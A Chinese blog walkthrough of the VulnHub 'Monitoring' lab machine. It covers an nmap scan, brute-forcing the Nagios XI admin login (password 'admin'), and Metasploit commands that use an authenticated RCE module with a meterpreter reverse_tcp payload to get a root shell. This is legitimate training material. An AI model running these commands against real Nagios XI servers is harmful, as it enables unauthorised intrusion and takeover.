vulnhub靶场,Monitoring

最新推荐文章于 2023-09-20 08:39:45 发布
最新推荐文章于 2023-09-20 08:39:45 发布
阅读量462 收藏 1
点赞数
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/119007234
版权

vulnhub靶场,Monitoring

环境准备

靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/
攻击机:kali(192.168.109.128)
靶机:Monitoring(192.168.109.139)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.139
使用nmap扫描查看目标靶机端口开放情况

nmap -Pn -sV -p- -A 192.168.109.139 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 19:40 CST
Nmap scan report for 192.168.109.139
Host is up (0.0011s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
|   256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_  256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp   open  smtp       Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-09-08T17:59:00
|_Not valid after:  2030-09-06T17:59:00
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Nagios XI
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Nagios XI
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after:  2030-09-06T18:28:08
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
5667/tcp open  tcpwrapped
MAC Address: 00:0C:29:2B:7C:FF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:  ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms 192.168.109.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

开放端口:22、25、80、389、443、5667
浏览器访问目标靶机80端口

没有啥能利用的
网站目录结构扫描

也没有啥有用的信息
回到web界面,点击Access Nagios XI

发现是一个登入页面

渗透过程

发现了登入页面,访问了其他的页面好像也只有这里能利用了,那就试试暴力破解

看来毫无目标的暴力破解是不可能的,去网上查找资料,搜索关键字

成功获得了默认的管理员账号,缩小了爆破范围
再次暴力破解

成功获得密码,登入网站后台

但是翻遍了网站所有页面都没有找到能利用的地方,那再次在网站上搜索关键词

看来这个版本是有一个远程代码执行的漏洞
看看metasploit里面有没有攻击代码

选择攻击模块

use exploit/linux/http/nagios_xi_authenticated_rce

设置payload

set payload linux/x64/meterpreter/reverse_tcp

设置攻击目标、本地监听、密码

set rhosts 192.168.109.139
set lhost 192.168.109.128
set password admin

输入exploit开始攻击成功获得一个meterpreter

提权过程

输入shell,发现已经是root用户

切换其根目录,成功获得flag,靶机Monitoring渗透结束

super 硕
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhubMonitoring(完整复现过程)
鲨鱼辣椒的博客
06-15 703
目录 信息搜集 扫描网段 扫描端口 扫描网站目录 查看网页 找到漏洞 看到登录页面尝试爆破 爆破出密码,尝试登录后台 getshell 后台行不通,还是回到搭建平台上 找到一个版本对应的脚本 getshell失败,扩大搜索范围。尝试多个脚本 找到正确脚本,设置选项 getshell 顺利拿到flag 信息搜集 扫描网段 扫描端口 nmap -A -P- 192.168.179.140 扫描网站目录 mul 目录没有扫出什么有价值的东西。 查看网页.
vulnhub MONITORING: 1 记录
qq_45826388的博客
09-17 340
靶机ip 192.168.34.155 nmap 扫描 访问页面 搜索nagios框架 利用msf 查看设置选项 发现USERNAME 测试密码为admin,登录成功 运行 查看权限
MONITORING: 1靶机
小小猪的博客
06-29 277
MONITORING: 1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.132 扫描端口 打开80端口,发现时nagios框架 搜索nagios框架 利用msf 查看设置选项 发现用户名 尝试密码为admin登,登录成功 设置参数 获得shell 进入交互模式,发现是root权限 进入root目录查看flag ...
看完这篇 教你玩转渗透测试靶机vulnhub——Monitoring
Aluxian_的博客
02-05 1347
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。这个靶机很简单都不需要提权就学习了一个msf模块的使用(希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
VulnHub靶场MONEYBOX:1
最新发布
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
看完这篇 教你玩转渗透测试靶机vulnhub——VICTIM: 1
Aluxian_的博客
10-29 1235
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。这个靶机的类型也是第一次做,比较简单。1.信息收集 获取ip地址 和端口信息2.工具的使用,破解wifi密码3.nohup-SUID提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
vulnhub Monitoring: 1
箭雨镜屋
07-18 1014
渗透思路:nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell
JavaMelody组件XXE漏洞解析
Exploit的小站~
05-10 1万+
====================================================== 转载原处:https://mp.weixin.qq.com/s/Tca3GGPCIc7FZaubUTh18Q 微信公众号:EnsecTeam(欢迎关注) ====================================================== 0x00 概述 ...
OSCP系列靶场-Esay-Monitoring保姆级
杳若的博客
09-20 194
OSCP系列靶场-Esay-Monitoring
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7224
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
[转] Linux System and Performance Monitoring(总结篇)
tatetian's tech blog
02-02 757
Linux System and Performance Monitoring(总结篇)Written by bixuan on 2009年08月14号 – 13:36Linux System and Performance Monitoring(总结篇)Date: 2009.07.21Author: Darren Hoch译: Tonnyom[AT]hotmail.com接前
VulnHub系列』serial: 2-Walkthrough
ins1ght的博客
11-10 1888
靶机发布日期:2019年9月27日,难度:中等++。用到了apk逆向和ELF中的ROP技术,web狗(小白)表示伤不起,一路硬刚下来的,求鼓励~
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4456
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4619
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值